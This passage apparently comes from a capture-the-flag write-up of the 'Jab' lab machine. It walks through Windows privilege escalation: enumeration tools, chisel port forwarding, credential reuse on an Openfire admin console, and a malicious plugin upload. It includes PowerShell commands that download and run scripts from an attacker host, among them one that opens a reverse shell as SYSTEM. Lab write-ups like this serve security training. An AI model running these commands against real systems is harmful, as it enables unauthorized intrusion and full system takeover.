  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       472
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1104
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1524
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       1928
  TCP    0.0.0.0:49686          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49687          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49690          0.0.0.0:0              LISTENING       632
  TCP    0.0.0.0:49703          0.0.0.0:0              LISTENING       616
  TCP    0.0.0.0:49768          0.0.0.0:0              LISTENING       2904
  TCP    0.0.0.0:58253          0.0.0.0:0              LISTENING       1892
  TCP    0.0.0.0:62221          0.0.0.0:0              LISTENING       2896
  TCP    10.10.11.4:53       0.0.0.0:0              LISTENING       2904
  TCP    10.10.11.4:139      0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2904
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       3308
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       3308
```

Ports 9090 and 9091 are internal, but I expect them to be related to XMPP.

We can try running [adPEAS](https://github.com/61106960/adPEAS):

```console
C:\windows\tasks> IEX(IWR http://10.10.14.31:8000/adPEAS.ps1 -UseBasicParsing)
C:\windows\tasks> Invoke-adPEAS 
```

It did not discover anything which could be used for EoP.  
Next, we can try running [PrivescCheck](https://github.com/itm4n/PrivescCheck):

```console
C:\windows\tasks> IEX(IWR http://10.10.14.31:8000/PrivescCheck.ps1 -UseBasicParsing)
C:\windows\tasks> Invoke-PrivescCheck -Extended
```

```console
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0043 - Reconnaissance                           ┃
┃ NAME     ┃ Non-default applications                          ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about non-default and third-party            ┃
┃ applications by searching the registry and the default       ┃
┃ install locations.                                           ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
[*] Status: Informational 

Name                        FullName                                          
----                        --------                                          
Java                        C:\Program Files (x86)\Java                       
jre-1.8                     C:\Program Files (x86)\Java\jre-1.8               
Mozilla Maintenance Service C:\Program Files (x86)\Mozilla Maintenance Service
Java                        C:\Program Files\Java                             
jre-1.8                     C:\Program Files\Java\jre-1.8                     
Mozilla Firefox             C:\Program Files\Mozilla Firefox                  
Openfire                    C:\Program Files\Openfire                         
VMware                      C:\Program Files\VMware                           
VMware Tools                C:\Program Files\VMware\VMware Tools              
```

Java, Mozilla Firefox and Openfire; I need to look into those.

I also ran [certipy](https://github.com/ly4k/Certipy)

```console
opcode@debian$ certipy find -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' -dc-ip 10.10.11.4 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'jab-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'jab-DC01-CA' via CSRA: DCOM SessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'jab-DC01-CA' via RRP
[*] Got CA configuration for 'jab-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : jab-DC01-CA
    DNS Name                            : DC01.jab.htb
    Certificate Subject                 : CN=jab-DC01-CA, DC=jab, DC=htb
    Certificate Serial Number           : 737696650DD0F7AD43FC233464250AC4
    Certificate Validity Start          : 2023-11-01 18:26:58+00:00
    Certificate Validity End            : 2122-11-01 18:36:58+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : JAB.HTB\Administrators
      Access Rights
        ManageCertificates              : JAB.HTB\Administrators
                                          JAB.HTB\Domain Admins
                                          JAB.HTB\Enterprise Admins
        ManageCa                        : JAB.HTB\Administrators
                                          JAB.HTB\Domain Admins
                                          JAB.HTB\Enterprise Admins
        Enroll                          : JAB.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates
```

[LaZagne](https://github.com/AlessandroZ/LaZagne) did not find anything either:

```console
C:\windows\tasks> iwr 10.10.14.31:8000/LaZagne.exe -o LaZagne.exe
C:\windows\tasks> .\LaZagne.exe all

|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|


[+] 0 passwords have been found.
For more information launch it again with the -v option
```

With no further clue, I returned to ports 9090 and 9091.  
We can use [chisel](https://github.com/jpillora/chisel) to forward these ports.  
On my VM:

```console
opcode@debian$ ./chisel server -p 9999 --reverse -v
```

On the box:

```console
PS C:\Windows\Tasks> iwr 10.10.14.31:8000/chisel.exe -o chisel.exe
PS C:\Windows\Tasks> .\chisel.exe client 10.10.14.31:9999 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091
```

The ports can be accessed locally now:

```console
opcode@debian$ nmap -Pn -sC -sV -p 9090,9091 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.017s latency).

PORT     STATE SERVICE             VERSION
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 01:33:09 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 01:33:16 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open  ssl/xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 01:33:29 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 01:33:30 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
```

Port 9090 is Openfire Admin Console. The version is 4.7.5  
`admin:admin` did not work. I looked inside `C:\program files\openfire\conf`, but couldn't find any easy wins.  
We also don't have write access to that directory:

```console
C:\> Get-Acl -Path 'C:\program files\openfire\conf' | Format-List


Path   : Microsoft.PowerShell.Core\FileSystem::C:\program files\openfire\conf
Owner  : BUILTIN\Administrators
Group  : JAB\Domain Users
Access : NT SERVICE\TrustedInstaller Allow  FullControl
         NT SERVICE\TrustedInstaller Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         NT AUTHORITY\SYSTEM Allow  268435456
         BUILTIN\Administrators Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Users Allow  ReadAndExecute, Synchronize
         BUILTIN\Users Allow  -1610612736
         CREATOR OWNER Allow  268435456
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  -1610612736
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize
         APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow  -1610612736
Audit  : 
Sddl   : O:BAG:DUD:AI(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-
         956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICII
         OID;GA;;;BA)(A;ID;0x1200a9;;;BU)(A;OICIIOID;GXGR;;;BU)(A;OICIIOID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR
         ;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
```

Looking for vulnerabilities in Openfire 4.7.5, I found [CVE-2023-32315](https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce)  
It is a path traversal vulnerability that results in RCE, but it got patched precisely in Openfire 4.7.5

Instead, if we check for credential reuse, we'd find that `svc_openfire:!@#$%^&*(1qazxsw` works on the Openfire Admin Console.  
To get RCE, we can follow the latter part of [CVE-2023-32315](https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce) article.  
From <http://localhost:9090/user-properties.jsp?username=svc_openfire>, we can verify that `svc_openfire` is Administrator.

Now, we can upload a vulnerable plugin from <https://github.com/miko550/CVE-2023-32315> to <http://localhost:9090/plugin-admin.jsp>  
In `Server` > `Server Settings` > `Management Tool`, we can use the password `123` and run arbitrary commands after choosing `system command` from the drop-down.

I ran:

```console
powershell.exe IEX(IWR http://10.10.14.31:8000/shell_wstderr.ps1 -UseBasicParsing)
```

And received a shell as system:

```console
C:\Program Files\Openfire\bin> whoami
nt authority\system
```
